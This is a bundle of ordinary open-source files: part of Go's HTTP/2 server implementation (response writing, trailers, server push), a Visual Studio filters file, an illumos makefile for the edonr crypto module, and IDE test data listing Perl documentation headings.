rw, req, err := sc.newWriterAndRequestNoBody(st, rp)
if err != nil {
return nil, nil, err
}
if bodyOpen {
if vv, ok := rp.header["Content-Length"]; ok {
req.ContentLength, _ = strconv.ParseInt(vv[0], 10, 64)
} else {
req.ContentLength = -1
}
req.Body.(*requestBody).pipe = &pipe{
b: &dataBuffer{expected: req.ContentLength},
}
}
return rw, req, nil
}
type requestParam struct {
method string
scheme, authority, path string
header http.Header
}
func (sc *serverConn) newWriterAndRequestNoBody(st *stream, rp requestParam) (*responseWriter, *http.Request, error) {
sc.serveG.check()
var tlsState *tls.ConnectionState // nil if not scheme https
if rp.scheme == "https" {
tlsState = sc.tlsState
}
needsContinue := rp.header.Get("Expect") == "100-continue"
if needsContinue {
rp.header.Del("Expect")
}
// Merge Cookie headers into one "; "-delimited value.
if cookies := rp.header["Cookie"]; len(cookies) > 1 {
rp.header.Set("Cookie", strings.Join(cookies, "; "))
}
// Setup Trailers
var trailer http.Header
for _, v := range rp.header["Trailer"] {
for _, key := range strings.Split(v, ",") {
key = http.CanonicalHeaderKey(strings.TrimSpace(key))
switch key {
case "Transfer-Encoding", "Trailer", "Content-Length":
// Bogus. (copy of http1 rules)
// Ignore.
default:
if trailer == nil {
trailer = make(http.Header)
}
trailer[key] = nil
}
}
}
delete(rp.header, "Trailer")
var url_ *url.URL
var requestURI string
if rp.method == "CONNECT" {
url_ = &url.URL{Host: rp.authority}
requestURI = rp.authority // mimic HTTP/1 server behavior
} else {
var err error
url_, err = url.ParseRequestURI(rp.path)
if err != nil {
return nil, nil, streamError(st.id, ErrCodeProtocol)
}
requestURI = rp.path
}
body := &requestBody{
conn: sc,
stream: st,
needsContinue: needsContinue,
}
req := &http.Request{
Method: rp.method,
URL: url_,
RemoteAddr: sc.remoteAddrStr,
Header: rp.header,
RequestURI: requestURI,
Proto: "HTTP/2.0",
ProtoMajor: 2,
ProtoMinor: 0,
TLS: tlsState,
Host: rp.authority,
Body: body,
Trailer: trailer,
}
req = requestWithContext(req, st.ctx)
rws := responseWriterStatePool.Get().(*responseWriterState)
bwSave := rws.bw
*rws = responseWriterState{} // zero all the fields
rws.conn = sc
rws.bw = bwSave
rws.bw.Reset(chunkWriter{rws})
rws.stream = st
rws.req = req
rws.body = body
rw := &responseWriter{rws: rws}
return rw, req, nil
}
// Run on its own goroutine.
func (sc *serverConn) runHandler(rw *responseWriter, req *http.Request, handler func(http.ResponseWriter, *http.Request)) {
didPanic := true
defer func() {
rw.rws.stream.cancelCtx()
if didPanic {
e := recover()
sc.writeFrameFromHandler(FrameWriteRequest{
write: handlerPanicRST{rw.rws.stream.id},
stream: rw.rws.stream,
})
// Same as net/http:
if shouldLogPanic(e) {
const size = 64 << 10
buf := make([]byte, size)
buf = buf[:runtime.Stack(buf, false)]
sc.logf("http2: panic serving %v: %v\n%s", sc.conn.RemoteAddr(), e, buf)
}
return
}
rw.handlerDone()
}()
handler(rw, req)
didPanic = false
}
func handleHeaderListTooLong(w http.ResponseWriter, r *http.Request) {
// 10.5.1 Limits on Header Block Size:
// .. "A server that receives a larger header block than it is
// willing to handle can send an HTTP 431 (Request Header Fields Too
// Large) status code"
const statusRequestHeaderFieldsTooLarge = 431 // only in Go 1.6+
w.WriteHeader(statusRequestHeaderFieldsTooLarge)
io.WriteString(w, "<h1>HTTP Error 431</h1><p>Request Header Field(s) Too Large</p>")
}
// called from handler goroutines.
// h may be nil.
func (sc *serverConn) writeHeaders(st *stream, headerData *writeResHeaders) error {
sc.serveG.checkNotOn() // NOT on
var errc chan error
if headerData.h != nil {
// If there's a header map (which we don't own), we have to block on
// this frame being written, so that an http.Flush mid-handler
// writes out the correct value of keys, before a handler later
// potentially mutates it.
errc = errChanPool.Get().(chan error)
}
if err := sc.writeFrameFromHandler(FrameWriteRequest{
write: headerData,
stream: st,
done: errc,
}); err != nil {
return err
}
if errc != nil {
select {
case err := <-errc:
errChanPool.Put(errc)
return err
case <-sc.doneServing:
return errClientDisconnected
case <-st.cw:
return errStreamClosed
}
}
return nil
}
// called from handler goroutines.
func (sc *serverConn) write100ContinueHeaders(st *stream) {
sc.writeFrameFromHandler(FrameWriteRequest{
write: write100ContinueHeadersFrame{st.id},
stream: st,
})
}
// A bodyReadMsg tells the server loop that the http.Handler read n
// bytes of the DATA from the client on the given stream.
type bodyReadMsg struct {
st *stream
n int
}
// called from handler goroutines.
// Notes that the handler for the given stream ID read n bytes of its body
// and schedules flow control tokens to be sent.
func (sc *serverConn) noteBodyReadFromHandler(st *stream, n int, err error) {
sc.serveG.checkNotOn() // NOT on
if n > 0 {
select {
case sc.bodyReadCh <- bodyReadMsg{st, n}:
case <-sc.doneServing:
}
}
}
func (sc *serverConn) noteBodyRead(st *stream, n int) {
sc.serveG.check()
sc.sendWindowUpdate(nil, n) // conn-level
if st.state != stateHalfClosedRemote && st.state != stateClosed {
// Don't send this WINDOW_UPDATE if the stream is closed
// remotely.
sc.sendWindowUpdate(st, n)
}
}
// st may be nil for conn-level
func (sc *serverConn) sendWindowUpdate(st *stream, n int) {
sc.serveG.check()
// "The legal range for the increment to the flow control
// window is 1 to 2^31-1 (2,147,483,647) octets."
// A Go Read call on 64-bit machines could in theory ask to read
// more than this. Very unlikely, but we handle it here
// rather than elsewhere for now.
const maxUint31 = 1<<31 - 1
for n >= maxUint31 {
sc.sendWindowUpdate32(st, maxUint31)
n -= maxUint31
}
sc.sendWindowUpdate32(st, int32(n))
}
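// Illustrative arithmetic for the splitting loop above (not part of the
// original file): with n = 5<<30 (5 GiB), the loop sends two WINDOW_UPDATE
// increments of 2^31-1 octets each, then a final increment of
// n - 2*(2^31-1) = 1073741826 octets, keeping every frame inside the legal
// 1..2^31-1 range.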
// st may be nil for conn-level
func (sc *serverConn) sendWindowUpdate32(st *stream, n int32) {
sc.serveG.check()
if n == 0 {
return
}
if n < 0 {
panic("negative update")
}
var streamID uint32
if st != nil {
streamID = st.id
}
sc.writeFrame(FrameWriteRequest{
write: writeWindowUpdate{streamID: streamID, n: uint32(n)},
stream: st,
})
var ok bool
if st == nil {
ok = sc.inflow.add(n)
} else {
ok = st.inflow.add(n)
}
if !ok {
panic("internal error; sent too many window updates without decrements?")
}
}
// requestBody is the Handler's Request.Body type.
// Read and Close may be called concurrently.
type requestBody struct {
stream *stream
conn *serverConn
closed bool // for use by Close only
sawEOF bool // for use by Read only
pipe *pipe // non-nil if we have a HTTP entity message body
needsContinue bool // need to send a 100-continue
}
func (b *requestBody) Close() error {
if b.pipe != nil && !b.closed {
b.pipe.BreakWithError(errClosedBody)
}
b.closed = true
return nil
}
func (b *requestBody) Read(p []byte) (n int, err error) {
if b.needsContinue {
b.needsContinue = false
b.conn.write100ContinueHeaders(b.stream)
}
if b.pipe == nil || b.sawEOF {
return 0, io.EOF
}
n, err = b.pipe.Read(p)
if err == io.EOF {
b.sawEOF = true
}
if b.conn == nil && inTests {
return
}
b.conn.noteBodyReadFromHandler(b.stream, n, err)
return
}
// responseWriter is the http.ResponseWriter implementation. It's
// intentionally small (1 pointer wide) to minimize garbage. The
// responseWriterState pointer inside is zeroed at the end of a
// request (in handlerDone) and calls on the responseWriter thereafter
// simply crash (caller's mistake), but the much larger responseWriterState
// and buffers are reused between multiple requests.
type responseWriter struct {
rws *responseWriterState
}
// Optional http.ResponseWriter interfaces implemented.
var (
_ http.CloseNotifier = (*responseWriter)(nil)
_ http.Flusher = (*responseWriter)(nil)
_ stringWriter = (*responseWriter)(nil)
)
type responseWriterState struct {
// immutable within a request:
stream *stream
req *http.Request
body *requestBody // to close at end of request, if DATA frames didn't
conn *serverConn
// TODO: adjust buffer writing sizes based on server config, frame size updates from peer, etc
bw *bufio.Writer // writing to a chunkWriter{this *responseWriterState}
// mutated by http.Handler goroutine:
handlerHeader http.Header // nil until called
snapHeader http.Header // snapshot of handlerHeader at WriteHeader time
trailers []string // set in writeChunk
status int // status code passed to WriteHeader
wroteHeader bool // WriteHeader called (explicitly or implicitly). Not necessarily sent to user yet.
sentHeader bool // have we sent the header frame?
handlerDone bool // handler has finished
dirty bool // a Write failed; don't reuse this responseWriterState
sentContentLen int64 // non-zero if handler set a Content-Length header
wroteBytes int64
closeNotifierMu sync.Mutex // guards closeNotifierCh
closeNotifierCh chan bool // nil until first used
}
type chunkWriter struct{ rws *responseWriterState }
func (cw chunkWriter) Write(p []byte) (n int, err error) { return cw.rws.writeChunk(p) }
func (rws *responseWriterState) hasTrailers() bool { return len(rws.trailers) != 0 }
// declareTrailer is called for each Trailer header when the
// response header is written. It notes that a header will need to be
// written in the trailers at the end of the response.
func (rws *responseWriterState) declareTrailer(k string) {
k = http.CanonicalHeaderKey(k)
if !ValidTrailerHeader(k) {
// Forbidden by RFC 2616 14.40.
rws.conn.logf("ignoring invalid trailer %q", k)
return
}
if !strSliceContains(rws.trailers, k) {
rws.trailers = append(rws.trailers, k)
}
}
// writeChunk writes chunks from the bufio.Writer. But because
// bufio.Writer may bypass its chunking, sometimes p may be
// arbitrarily large.
//
// writeChunk is also responsible (on the first chunk) for sending the
// HEADER response.
func (rws *responseWriterState) writeChunk(p []byte) (n int, err error) {
if !rws.wroteHeader {
rws.writeHeader(200)
}
isHeadResp := rws.req.Method == "HEAD"
if !rws.sentHeader {
rws.sentHeader = true
var ctype, clen string
if clen = rws.snapHeader.Get("Content-Length"); clen != "" {
rws.snapHeader.Del("Content-Length")
clen64, err := strconv.ParseInt(clen, 10, 64)
if err == nil && clen64 >= 0 {
rws.sentContentLen = clen64
} else {
clen = ""
}
}
if clen == "" && rws.handlerDone && bodyAllowedForStatus(rws.status) && (len(p) > 0 || !isHeadResp) {
clen = strconv.Itoa(len(p))
}
_, hasContentType := rws.snapHeader["Content-Type"]
if !hasContentType && bodyAllowedForStatus(rws.status) {
ctype = http.DetectContentType(p)
}
var date string
if _, ok := rws.snapHeader["Date"]; !ok {
// TODO(bradfitz): be faster here, like net/http? measure.
date = time.Now().UTC().Format(http.TimeFormat)
}
for _, v := range rws.snapHeader["Trailer"] {
foreachHeaderElement(v, rws.declareTrailer)
}
endStream := (rws.handlerDone && !rws.hasTrailers() && len(p) == 0) || isHeadResp
err = rws.conn.writeHeaders(rws.stream, &writeResHeaders{
streamID: rws.stream.id,
httpResCode: rws.status,
h: rws.snapHeader,
endStream: endStream,
contentType: ctype,
contentLength: clen,
date: date,
})
if err != nil {
rws.dirty = true
return 0, err
}
if endStream {
return 0, nil
}
}
if isHeadResp {
return len(p), nil
}
if len(p) == 0 && !rws.handlerDone {
return 0, nil
}
if rws.handlerDone {
rws.promoteUndeclaredTrailers()
}
endStream := rws.handlerDone && !rws.hasTrailers()
if len(p) > 0 || endStream {
// only send a 0 byte DATA frame if we're ending the stream.
if err := rws.conn.writeDataFromHandler(rws.stream, p, endStream); err != nil {
rws.dirty = true
return 0, err
}
}
if rws.handlerDone && rws.hasTrailers() {
err = rws.conn.writeHeaders(rws.stream, &writeResHeaders{
streamID: rws.stream.id,
h: rws.handlerHeader,
trailers: rws.trailers,
endStream: true,
})
if err != nil {
rws.dirty = true
}
return len(p), err
}
return len(p), nil
}
// TrailerPrefix is a magic prefix for ResponseWriter.Header map keys
// that, if present, signals that the map entry is actually for
// the response trailers, and not the response headers. The prefix
// is stripped after the ServeHTTP call finishes and the values are
// sent in the trailers.
//
// This mechanism is intended only for trailers that are not known
// prior to the headers being written. If the set of trailers is fixed
// or known before the header is written, the normal Go trailers mechanism
// is preferred:
// https://golang.org/pkg/net/http/#ResponseWriter
// https://golang.org/pkg/net/http/#example_ResponseWriter_trailers
const TrailerPrefix = "Trailer:"
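// A minimal usage sketch (the handler and trailer name are hypothetical,
// not part of this file):
//
//	func exampleHandler(w http.ResponseWriter, r *http.Request) {
//		w.WriteHeader(200) // response headers are now committed
//		// The "Trailer:" prefix marks this entry as a trailer.
//		w.Header().Set(TrailerPrefix+"My-Checksum", "abc")
//		io.WriteString(w, "body")
//	}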
// promoteUndeclaredTrailers permits http.Handlers to set trailers
// after the header has already been flushed. Because the Go
// ResponseWriter interface has no way to set Trailers (only the
// Header), and because we didn't want to expand the ResponseWriter
// interface, and because nobody used trailers, and because RFC 2616
// says you SHOULD (but not must) predeclare any trailers in the
// header, the official ResponseWriter rules said trailers in Go must
// be predeclared, and then we reuse the same ResponseWriter.Header()
// map to mean both Headers and Trailers. When it's time to write the
// Trailers, we pick out the fields of Headers that were declared as
// trailers. That worked for a while, until we found the first major
// user of Trailers in the wild: gRPC (using them only over http2),
// and gRPC libraries permit setting trailers mid-stream without
// predeclaring them. So: change of plans. We still permit the old
// way, but we also permit this hack: if a Header() key begins with
// "Trailer:", the suffix of that key is a Trailer. Because ':' is an
// invalid token byte anyway, there is no ambiguity. (And it's already
// filtered out.) It's mildly hacky, but not terrible.
//
// This method runs after the Handler is done and promotes any Header
// fields to be trailers.
func (rws *responseWriterState) promoteUndeclaredTrailers() {
for k, vv := range rws.handlerHeader {
if !strings.HasPrefix(k, TrailerPrefix) {
continue
}
trailerKey := strings.TrimPrefix(k, TrailerPrefix)
rws.declareTrailer(trailerKey)
rws.handlerHeader[http.CanonicalHeaderKey(trailerKey)] = vv
}
if len(rws.trailers) > 1 {
sorter := sorterPool.Get().(*sorter)
sorter.SortStrings(rws.trailers)
sorterPool.Put(sorter)
}
}
func (w *responseWriter) Flush() {
rws := w.rws
if rws == nil {
panic("Header called after Handler finished")
}
if rws.bw.Buffered() > 0 {
if err := rws.bw.Flush(); err != nil {
// Ignore the error. The frame writer already knows.
return
}
} else {
// The bufio.Writer won't call chunkWriter.Write
// (writeChunk) with zero bytes, so we have to do it
// ourselves to force the HTTP response header and/or
// final DATA frame (with END_STREAM) to be sent.
rws.writeChunk(nil)
}
}
func (w *responseWriter) CloseNotify() <-chan bool {
rws := w.rws
if rws == nil {
panic("CloseNotify called after Handler finished")
}
rws.closeNotifierMu.Lock()
ch := rws.closeNotifierCh
if ch == nil {
ch = make(chan bool, 1)
rws.closeNotifierCh = ch
cw := rws.stream.cw
go func() {
cw.Wait() // wait for close
ch <- true
}()
}
rws.closeNotifierMu.Unlock()
return ch
}
func (w *responseWriter) Header() http.Header {
rws := w.rws
if rws == nil {
panic("Header called after Handler finished")
}
if rws.handlerHeader == nil {
rws.handlerHeader = make(http.Header)
}
return rws.handlerHeader
}
func (w *responseWriter) WriteHeader(code int) {
rws := w.rws
if rws == nil {
panic("WriteHeader called after Handler finished")
}
rws.writeHeader(code)
}
func (rws *responseWriterState) writeHeader(code int) {
if !rws.wroteHeader {
rws.wroteHeader = true
rws.status = code
if len(rws.handlerHeader) > 0 {
rws.snapHeader = cloneHeader(rws.handlerHeader)
}
}
}
func cloneHeader(h http.Header) http.Header {
h2 := make(http.Header, len(h))
for k, vv := range h {
vv2 := make([]string, len(vv))
copy(vv2, vv)
h2[k] = vv2
}
return h2
}
// The Life Of A Write is like this:
//
// * Handler calls w.Write or w.WriteString ->
// * -> rws.bw (*bufio.Writer) ->
// * (Handler might call Flush)
// * -> chunkWriter{rws}
// * -> responseWriterState.writeChunk(p []byte)
// * -> responseWriterState.writeChunk (most of the magic; see comment there)
func (w *responseWriter) Write(p []byte) (n int, err error) {
return w.write(len(p), p, "")
}
func (w *responseWriter) WriteString(s string) (n int, err error) {
return w.write(len(s), nil, s)
}
// Either dataB or dataS is set, never both.
func (w *responseWriter) write(lenData int, dataB []byte, dataS string) (n int, err error) {
rws := w.rws
if rws == nil {
panic("Write called after Handler finished")
}
if !rws.wroteHeader {
w.WriteHeader(200)
}
if !bodyAllowedForStatus(rws.status) {
return 0, http.ErrBodyNotAllowed
}
rws.wroteBytes += int64(len(dataB)) + int64(len(dataS)) // only one can be set
if rws.sentContentLen != 0 && rws.wroteBytes > rws.sentContentLen {
// TODO: send a RST_STREAM
return 0, errors.New("http2: handler wrote more than declared Content-Length")
}
if dataB != nil {
return rws.bw.Write(dataB)
} else {
return rws.bw.WriteString(dataS)
}
}
func (w *responseWriter) handlerDone() {
rws := w.rws
dirty := rws.dirty
rws.handlerDone = true
w.Flush()
w.rws = nil
if !dirty {
// Only recycle the pool if all prior Write calls to
// the serverConn goroutine completed successfully. If
// they returned earlier due to resets from the peer
// there might still be write goroutines outstanding
// from the serverConn referencing the rws memory. See
// issue 20704.
responseWriterStatePool.Put(rws)
}
}
// Push errors.
var (
ErrRecursivePush = errors.New("http2: recursive push not allowed")
ErrPushLimitReached = errors.New("http2: push would exceed peer's SETTINGS_MAX_CONCURRENT_STREAMS")
)
// pushOptions is the internal version of http.PushOptions, which we
// cannot include here because it's only defined in Go 1.8 and later.
type pushOptions struct {
Method string
Header http.Header
}
func (w *responseWriter) push(target string, opts pushOptions) error {
st := w.rws.stream
sc := st.sc
sc.serveG.checkNotOn()
// No recursive pushes: "PUSH_PROMISE frames MUST only be sent on a peer-initiated stream."
// http://tools.ietf.org/html/rfc7540#section-6.6
if st.isPushed() {
return ErrRecursivePush
}
// Default options.
if opts.Method == "" {
opts.Method = "GET"
}
if opts.Header == nil {
opts.Header = http.Header{}
}
wantScheme := "http"
if w.rws.req.TLS != nil {
wantScheme = "https"
}
// Validate the request.
u, err := url.Parse(target)
if err != nil {
return err
}
if u.Scheme == "" {
if !strings.HasPrefix(target, "/") {
return fmt.Errorf("target must be an absolute URL or an absolute path: %q", target)
}
u.Scheme = wantScheme
u.Host = w.rws.req.Host
} else {
if u.Scheme != wantScheme {
return fmt.Errorf("cannot push URL with scheme %q from request with scheme %q", u.Scheme, wantScheme)
}
if u.Host == "" {
return errors.New("URL must have a host")
}
}
for k := range opts.Header {
if strings.HasPrefix(k, ":") {
return fmt.Errorf("promised request headers cannot include pseudo header %q", k)
}
// These headers are meaningful only if the request has a body,
// but PUSH_PROMISE requests cannot have a body.
// http://tools.ietf.org/html/rfc7540#section-8.2
// Also disallow Host, since the promised URL must be absolute.
switch strings.ToLower(k) {
case "content-length", "content-encoding", "trailer", "te", "expect", "host":
return fmt.Errorf("promised request headers cannot include %q", k)
}
}
if err := checkValidHTTP2RequestHeaders(opts.Header); err != nil {
return err
}
// The RFC effectively limits promised requests to GET and HEAD:
// "Promised requests MUST be cacheable [GET, HEAD, or POST], and MUST be safe [GET or HEAD]"
// http://tools.ietf.org/html/rfc7540#section-8.2
if opts.Method != "GET" && opts.Method != "HEAD" {
return fmt.Errorf("method %q must be GET or HEAD", opts.Method)
}
msg := &startPushRequest{
parent: st,
method: opts.Method,
url: u,
header: cloneHeader(opts.Header),
done: errChanPool.Get().(chan error),
}
select {
case <-sc.doneServing:
return errClientDisconnected
case <-st.cw:
return errStreamClosed
case sc.serveMsgCh <- msg:
}
select {
case <-sc.doneServing:
return errClientDisconnected
case <-st.cw:
return errStreamClosed
case err := <-msg.done:
errChanPool.Put(msg.done)
return err
}
}
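// Handlers reach this method through the Go 1.8+ http.Pusher interface; a
// hedged sketch follows (the handler and pushed path are hypothetical):
//
//	func handler(w http.ResponseWriter, r *http.Request) {
//		if pusher, ok := w.(http.Pusher); ok {
//			// Push may fail (e.g. http.ErrNotSupported); often ignored.
//			_ = pusher.Push("/static/app.css", nil)
//		}
//	}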
type startPushRequest struct {
parent *stream
method string
url *url.URL
header http.Header
done chan error
}
func (sc *serverConn) startPush(msg *startPushRequest) {
sc.serveG.check()
// http://tools.ietf.org/html/rfc7540#section-6.6.
// PUSH_PROMISE frames MUST only be sent on a peer-initiated stream that
// is in either the "open" or "half-closed (remote)" state.
if msg.parent.state != stateOpen && msg.parent.state != stateHalfClosedRemote {
// responseWriter.Push checks that the stream is peer-initiated.
msg.done <- errStreamClosed
return
}
// http://tools.ietf.org/html/rfc7540#section-6.6.
if !sc.pushEnabled {
msg.done <- http.ErrNotSupported
return
}
// PUSH_PROMISE frames must be sent in increasing order by stream ID, so
// we allocate an ID for the promised stream lazily, when the PUSH_PROMISE
// is written. Once the ID is allocated, we start the request handler.
allocatePromisedID := func() (uint32, error) {
sc.serveG.check()
// Check this again, just in case. Technically, we might have received
// an updated SETTINGS by the time we got around to writing this frame.
if !sc.pushEnabled {
return 0, http.ErrNotSupported
}
// http://tools.ietf.org/html/rfc7540#section-6.5.2.
if sc.curPushedStreams+1 > sc.clientMaxStreams {
return 0, ErrPushLimitReached
}
// http://tools.ietf.org/html/rfc7540#section-5.1.1.
// Streams initiated by the server MUST use even-numbered identifiers.
// A server that is unable to establish a new stream identifier can send a GOAWAY
// frame so that the client is forced to open a new connection for new streams.
if sc.maxPushPromiseID+2 >= 1<<31 {
sc.startGracefulShutdownInternal()
return 0, ErrPushLimitReached
}
sc.maxPushPromiseID += 2
promisedID := sc.maxPushPromiseID
// http://tools.ietf.org/html/rfc7540#section-8.2.
// Strictly speaking, the new stream should start in "reserved (local)", then
// transition to "half closed (remote)" after sending the initial HEADERS, but
// we start in "half closed (remote)" for simplicity.
// See further comments at the definition of stateHalfClosedRemote.
promised := sc.newStream(promisedID, msg.parent.id, stateHalfClosedRemote)
rw, req, err := sc.newWriterAndRequestNoBody(promised, requestParam{
method: msg.method,
scheme: msg.url.Scheme,
authority: msg.url.Host,
path: msg.url.RequestURI(),
header: cloneHeader(msg.header), // clone since handler runs concurrently with writing the PUSH_PROMISE
})
if err != nil {
// Should not happen, since we've already validated msg.url.
panic(fmt.Sprintf("newWriterAndRequestNoBody(%+v): %v", msg.url, err))
}
go sc.runHandler(rw, req, sc.handler.ServeHTTP)
return promisedID, nil
}
sc.writeFrame(FrameWriteRequest{
write: &writePushPromise{
streamID: msg.parent.id,
method: msg.method,
url: msg.url,
h: msg.header,
allocatePromisedID: allocatePromisedID,
},
stream: msg.parent,
done: msg.done,
})
}
// foreachHeaderElement splits v according to the "#rule" construction
// in RFC 2616 section 2.1 and calls fn for each non-empty element.
func foreachHeaderElement(v string, fn func(string)) {
v = textproto.TrimString(v)
if v == "" {
return
}
if !strings.Contains(v, ",") {
fn(v)
return
}
for _, f := range strings.Split(v, ",") {
if f = textproto.TrimString(f); f != "" {
fn(f)
}
}
}
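// Example behavior (illustrative): foreachHeaderElement("a, b,, c", fn)
// calls fn("a"), fn("b") and fn("c"); the empty element produced by the
// doubled comma is skipped.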
// From http://httpwg.org/specs/rfc7540.html#rfc.section.8.1.2.2
var connHeaders = []string{
"Connection",
"Keep-Alive",
"Proxy-Connection",
"Transfer-Encoding",
"Upgrade",
}
// checkValidHTTP2RequestHeaders checks whether h is a valid HTTP/2 request,
// per RFC 7540 Section 8.1.2.2.
// The returned error is reported to users.
func checkValidHTTP2RequestHeaders(h http.Header) error {
for _, k := range connHeaders {
if _, ok := h[k]; ok {
return fmt.Errorf("request header %q is not valid in HTTP/2", k)
}
}
te := h["Te"]
if len(te) > 0 && (len(te) > 1 || (te[0] != "trailers" && te[0] != "")) {
return errors.New(`request header "TE" may only be "trailers" in HTTP/2`)
}
return nil
}
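// Illustrative outcomes (not part of the original file): a request carrying
// "Connection: keep-alive" or "TE: gzip" fails this check, while
// "TE: trailers" (or an empty TE value) passes.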
func new400Handler(err error) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
http.Error(w, err.Error(), http.StatusBadRequest)
}
}
// ValidTrailerHeader reports whether name is a valid header field name to appear
// in trailers.
// See: http://tools.ietf.org/html/rfc7230#section-4.1.2
func ValidTrailerHeader(name string) bool {
name = http.CanonicalHeaderKey(name)
if strings.HasPrefix(name, "If-") || badTrailer[name] {
return false
}
return true
}
var badTrailer = map[string]bool{
"Authorization": true,
"Cache-Control": true,
"Connection": true,
"Content-Encoding": true,
"Content-Length": true,
"Content-Range": true,
"Content-Type": true,
"Expect": true,
"Host": true,
"Keep-Alive": true,
"Max-Forwards": true,
"Pragma": true,
"Proxy-Authenticate": true,
"Proxy-Authorization": true,
"Proxy-Connection": true,
"Range": true,
"Realm": true,
"Te": true,
"Trailer": true,
"Transfer-Encoding": true,
"Www-Authenticate": true,
}
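// Illustrative outcomes for ValidTrailerHeader (not part of the original
// file): "X-Checksum" is valid; "If-Match" is rejected by the "If-" prefix
// rule; "Content-Length" is rejected via the badTrailer table above.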
// h1ServerKeepAlivesDisabled reports whether hs has its keep-alives
// disabled. See comments on h1ServerShutdownChan above for why
// the code is written this way.
func h1ServerKeepAlivesDisabled(hs *http.Server) bool {
var x interface{} = hs
type I interface {
doKeepAlives() bool
}
if hs, ok := x.(I); ok {
return !hs.doKeepAlives()
}
return false
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{28675388-705d-4cd8-882e-32b51259a88a}</UniqueIdentifier>
<Extensions>cpp;c;cxx;def;odl;idl;hpj;bat;asm</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="src\Main.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="src\Application62.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<None Include="CMakeLists.txt" />
<None Include="..\Diary.txt" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="src\Application62.h">
<Filter>Source Files</Filter>
</ClInclude>
</ItemGroup>
</Project> | {
"pile_set_name": "Github"
} |
#
# CDDL HEADER START
#
# The contents of this file are subject to the terms of the
# Common Development and Distribution License (the "License").
# You may not use this file except in compliance with the License.
#
# You can obtain a copy of the license at usr/src/OPENSOLARIS.LICENSE
# or http://opensource.org/licenses/CDDL-1.0.
# See the License for the specific language governing permissions
# and limitations under the License.
#
# When distributing Covered Code, include this CDDL HEADER in each
# file and include the License file at usr/src/OPENSOLARIS.LICENSE.
# If applicable, add the following below this CDDL HEADER, with the
# fields enclosed by brackets "[]" replaced with your own identifying
# information: Portions Copyright [yyyy] [name of copyright owner]
#
# CDDL HEADER END
#
#
# Copyright 2013 Saso Kiselkov. All rights reserved.
#
#
# This makefile drives the production of the edonr kernel module.
#
# intel architecture dependent
#
#
# Path to the base of the uts directory tree (usually /usr/src/uts).
#
UTSBASE = ../..
COMDIR = $(COMMONBASE)/crypto
#
# Define the module and object file sets.
#
MODULE = edonr
OBJECTS = $(EDONR_OBJS:%=$(OBJS_DIR)/%)
LINTS = $(EDONR_OBJS:%.o=$(LINTS_DIR)/%.ln)
ROOTMODULE = $(ROOT_CRYPTO_DIR)/$(MODULE)
ROOTLINK = $(ROOT_MISC_DIR)/$(MODULE)
#
# Include common rules.
#
include $(UTSBASE)/intel/Makefile.intel
#
# Define targets
#
ALL_TARGET = $(BINARY)
LINT_TARGET = $(MODULE).lint
INSTALL_TARGET = $(BINARY) $(ROOTMODULE) $(ROOTLINK)
#
# Linkage dependencies
#
LDFLAGS += -dy -Nmisc/kcf
CFLAGS += -I$(COMDIR)
LINTFLAGS += -I$(COMDIR)
#
# Default build targets.
#
.KEEP_STATE:
def: $(DEF_DEPS)
all: $(ALL_DEPS)
clean: $(CLEAN_DEPS)
clobber: $(CLOBBER_DEPS)
lint: $(LINT_DEPS)
modlintlib: $(MODLINTLIB_DEPS)
clean.lint: $(CLEAN_LINT_DEPS)
install: $(INSTALL_DEPS)
$(ROOTLINK): $(ROOT_MISC_DIR) $(ROOTMODULE)
-$(RM) $@; ln $(ROOTMODULE) $@
#
# Include common targets.
#
include $(UTSBASE)/intel/Makefile.targ
| {
"pile_set_name": "Github"
} |
Text: Acknowledgements; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Acknowledgements
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 3910 in perl5144delta.pod
Text: CVE-2013-1667: memory exhaustion with arbitrary hash keys; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: CVE-2013-1667: memory exhaustion with arbitrary hash keys
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 608 in perl5144delta.pod
Text: Changes to Existing Documentation; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Changes to Existing Documentation
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 2975 in perl5144delta.pod
Text: Configuration and Compilation; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Configuration and Compilation
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 3106 in perl5144delta.pod
Text: Core Enhancements; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Core Enhancements
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 329 in perl5144delta.pod
Text: DESCRIPTION; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: DESCRIPTION
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 75 in perl5144delta.pod
Text: Deprecations; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Deprecations
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 2359 in perl5144delta.pod
Text: Diagnostics; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Diagnostics
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 3024 in perl5144delta.pod
Text: Discontinued Platforms; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Discontinued Platforms
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 3211 in perl5144delta.pod
Text: Documentation; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Documentation
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 2920 in perl5144delta.pod
Text: Incompatible Changes; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
